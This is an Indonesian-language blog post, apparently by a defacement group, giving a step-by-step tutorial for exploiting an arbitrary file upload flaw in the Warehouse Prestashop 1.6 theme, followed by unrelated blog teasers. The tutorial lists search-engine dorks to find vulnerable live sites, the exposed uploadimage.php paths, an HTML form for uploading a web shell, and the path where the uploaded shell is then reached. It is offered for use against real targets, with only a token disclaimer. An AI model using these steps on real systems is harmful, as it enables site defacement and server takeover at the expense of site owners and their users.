Skip to main content

Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload


halo bertemu lagi dengan saya ,uyulcrack.. 
udah lama nih ga upload,,, biasa terlalu sibuk di dunia nyata. 
oke,, lanjut saja nih Tutorial Deface eXploit Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload . *exploit baru nanti dijelaskan dibawah. 
Dan makasih juga untuk bang People_hurt untuk live targetnya ....


Langsung ke tutor


#- Title: Joomla Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload
#- Author: people_hurt
#- Published : 21/06/2016
#- Developer : iqit-commerce
#- Link Download : themeforest .net/item/warehouse-responsive-prestashop-16-theme-blog/3178575
#- Fixed in Version : -
#- Tested on : windows , Linux , Other

Dork:
inurl:"/modules/simpleslideshow/"
inurl:"/modules/productpageadverts/"
inurl:"/modules/homepageadvertise/"
inurl:"/modules/columnadverts/"


masih bisa dikembangkan, cari /modules/namamoduleyglaen *Use your brain br0

1. disini gua jelasinnya lu pada udah ada CSRF nya ya jadi langsung praktek aja, pertama cari dulu target lwt Dorking di Search Engine 


2. kalo dah ketemu masukin deh exploit nya satu-satu sampe ketemu ERROR
Exploit &poc : 
- /modules/columnadverts/uploadimage.php
- /modules/homepageadvertise/uploadimage.php
- /modules/productpageadverts/uploadimage.php
- /modules/simpleslideshow/uploadimage.php
- dan lain"
(TERGANTUNG PAS DORKING namamodule NYA)

3. Vulnerability ~ dari kemaren sih, kalo gak error ya Blank *kalau ada cth yg lain yg menandakan vuln pada eXploit ini, silahkan ksh tau dikolom komentar


target.coli/[path]/modules/namamodule/uploadimage.php

4. nah dibawah ini CSRF nya, masukin aja sourcodenya dan ubah format ke HTML

CSRF: 

<form method="POST" action="target.co.li/modules/namamodule/uploadimage.php"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>

5. kalo udah buka deh CSRF nya pake browser kesukaan sobat 

Upload File/Shell Lu

6. kalo sukses upload bakalan kayak gini


Muncul Nama Shell/File yg Lu Upload

7. akses shell target.co.li/modules/namamodule/slides/namashellLu 


target.coli/[path]/modules/namamodule/slides/namashellLu

nah setelah itu terserah sobat dah maudiapain, saran dari gua sih titip file aja ama laporin bugnya, jangan salah digunainyaa , gua cuman share apa yang gua bisa dan live praktek gua sendiri jadi kecelakaan ditanggung oleh situ bukan pengarang .... 
ayo Jangan Jadi Silent Reader, minimal kalo gak mau komen, tolong bagikan yak >.<"
atau Like fanspage gua: UyulCrack | Orthellys
Like juga fanspage TKJ Cyber Art | kalau ada yg mau bertanya, terus atau kasih saran dan kritikan Silahkan kirim ke wall FP kami *kritikan dan saran yg membangun ya gengs.

Semoga bermanfaat & Membantu Sobat..
sampai ketemu lagi BAAAYYYYY .....

source and thanks to: People_hurt


uyulcrack


Kami Membuat Sejarah, Bukan hanya Barisan Kisah #staycoolandkeep./crootz





Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Comments

Popular posts from this blog

How to install CUCM 8.0.2 on Vmware | Call Manager Installation Guide

CUCM is a software-based call-processing component which serves as the main engine for Cisco VOIP infrastructure. This article can be used as a reference for your CUCM installation, This article can be used for any version of CUCM like 8.0, 8.6, 9.1 or 10.5. Let's jump to the installation directly. Make sure you have.. Before we begin, I want to make sure that you have the below softwares installed in your machine. Vmware Workstation Bootable Cisco Unified Call Manager ISO File GNS3 (Optional) - To Configure NTP Server A minimum of 2GB RAM and 80 GB HDD for Virtual Machine At this stage I assume that you have both Vmware Workstation and GNS3 installed. During installation you will be prompted to enter NTP server details. Follow the below steps to make a router to act as a NTP server in GNS3. Open ncpa.cpl from Run window. Find a Vmware network adapter. Double click the adapter and configure a private range IP, for example 120.0.0.1. Next open GNS3, Put a router and take console. Pa...

6 Url Shorteners Yang Menghasilkan Uang Selain AdF.ly

Salam sobat GBX nah di pertemuan kita kali ini ane akan membahas 6 Url Shorteners Yang Menghasilkan Uang Selain AdF.ly seperti yang anda tau adf.ly adalah url shortener terbaik yang membayar kita karena telah menggunakan jasannya, tapi selain adf.ly ternyata masih banyak lagi Url Shorteners Yang Menghasilkan Uang, sekarang kita lihat saja ulasan di bawah.  6 Url Shorteners Yang Menghasilkan Uang Selain AdF.ly 1. Adfly adf.ly Yup yang ini memang patut diletakkan di peringkat satu ya, Adfly sudah ada dan terpercaya sejak bertahu-tahun lalu dan sudah menjadi pemendek link / url terbaik selama ini.  Selain menyediakan fasilitas penyingkat url, adfly juga merupakan situs penghasil dollar yang sudah sangat terkenal (melalui Pay Per Click dan Referal). Banyak juga teman-teman di internet yang sudah sukses mendapatkan dollar lho. (adfly ini sudah terpercaya dan ya semoga terus aman begitu dech). Komisi yang telah anda dapatkan dari adfly ini bisa langsung di transfer ke pay...

Ethical Hacking - Cisco HSRP with Kali linux - Example Demonstration and Security precautions

The Hot Swappable Router Protocol (HSRP) is a way to build redundancy into your network by allowing two or more routers to continuously test each other for connectivity, and take over if a router fails.As multiple routers can participate in the HSRP group, there has to be an election to determine who's the primary router. This HSRP election is based on a priority value (0 to 255) that is configured on each router in the group. By default, the priority is 100. The router with the highest priority value (255 is highest) becomes the active router for the group. If all router priorities are equal or set to the default value, the router with the highest IP address on the HSRP interface becomes the active router. In this post, we are going to make our Kali machine a HSRP participant and to become the active router by setting the highest priority to it. Yersinia tool (in built in Kali) helps us to perform this test with ease. For more information on HSRP, please refer  RFC 2281 Yersinia Y...